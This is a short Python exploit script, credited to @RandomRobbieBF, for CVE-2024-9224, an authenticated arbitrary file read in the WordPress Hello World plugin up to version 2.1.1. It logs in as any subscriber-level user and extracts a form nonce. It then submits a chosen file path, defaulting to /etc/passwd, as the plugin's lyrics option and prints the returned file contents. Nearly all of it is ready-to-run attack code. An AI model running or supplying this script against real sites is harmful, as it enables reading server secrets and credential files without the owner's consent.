#!/usr/bin/env python3
import argparse
import requests
import re
from getpass import getpass
from bs4 import BeautifulSoup
import os

## Exploit script by @RandomRobbieBF

http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"




def vulncheck(url, username, password, ff):
    # Perform vulnerability check logic here
    print("Vulnerability check:", url)

    # Login to WordPress
    login_url = f"{url}/wp-login.php"
    session = requests.Session()
    login_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": f"{url}/wp-admin/options-general.php?page=hello-world",
    }

    try:
        login_response = session.post(login_url, data=login_data, headers={"User-Agent": user_agent})
        login_response.raise_for_status()
        # Extract the required cookies from the response headers
        cookies = login_response.cookies
        # Confirm successful login
        if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
            print("Logged in successfully.")
            try:
               pattern = r'name="hello_world_options_nonce" value="([^"]+)"'
               match = re.search(pattern, login_response.text)
               if match:
                  nonce = match.group(1)
                  print("Nonce value:", nonce)
               else:
                  print("Nonce not found.")
                  sys.exit(0)
            except Exception as e:
            	print("Failed to extract nonce - "+str(e)+"")
            	exit()
        else:
            print("Failed to log in.")
            exit()

        payloads = [
  		{"hello_world_options_nonce":nonce,"save":"Save Changes","hello_world_lyrics":ff,"_wp_http_referer":"/wp-admin/options-general.php?page=hello-world"}
        ]
        
        main_url = f"{url}/wp-admin/options-general.php?page=hello-world"
        for payload in payloads:
            ajax_response = session.post(main_url,data=payload, headers={"User-Agent": user_agent,"X-Requested-With": "XMLHttpRequest"})
            ajax_response.raise_for_status()

            # Check if option set successfully
            if ajax_response.status_code == 200:
                pattern = r'<span dir="ltr">(.*?)</span>'
                match = re.search(pattern, ajax_response.text)
                if match:
                   text = match.group(1)
                   print("Extracted text:", text)
                else:
                   print("No match found.")
            else:
                print(f"Failed to set option: {main_url}")
                exit()


       

    except requests.exceptions.RequestException as e:
        print(f"Request failed with an error: {e}")


# Add the vulnerability description as a comment
DESCRIPTION = """
Hello World <= 2.1.1 - Authenticated (Subscriber+) Arbitrary File Read
Description:
CVE-2024-9224 | The Hello World plugin for WordPress is vulnerable to Arbitrary File Reading in all versions up to, and including, 2.1.1 via the hello_world_lyric() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.
"""

# Use argparse to get the URL, username, and password arguments
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-u", "--url", help="Website URL", required=True)
parser.add_argument("-un", "--username", help="WordPress username")
parser.add_argument("-p", "--password", help="WordPress password")
parser.add_argument("-f", "--file", default="/etc/passwd", help="File to display")
args = parser.parse_args()

# Prompt for password if not provided as an argument
if not args.password:
    args.password = getpass("Enter the WordPress password: ")


# Usage
vulncheck(args.url, args.username, args.password, args.file)